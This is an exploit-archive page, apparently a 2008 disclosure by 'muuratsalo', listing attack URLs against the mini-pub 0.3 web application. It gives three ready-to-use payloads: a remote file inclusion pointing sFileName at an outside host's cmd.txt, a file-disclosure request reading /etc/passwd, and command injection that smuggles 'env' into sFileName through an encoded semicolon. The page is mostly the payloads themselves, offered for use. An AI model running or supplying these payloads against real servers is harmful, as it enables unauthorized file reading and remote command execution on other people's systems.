[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : mini-pub 0.3 (LFD/CE) Multiple Remote Vulnerabilities
# Published : 2008-10-12
# Author : muuratsalo
# Previous Title : IndexScript 3.0 (sug_cat.php parent_id) SQL Injection Vulnerability
# Next Title : mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities
mini-pub 0.3 multiple vulnerabilities
download http://sourceforge.net/projects/mini-pub/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
# www.Syue.com [2008-10-12]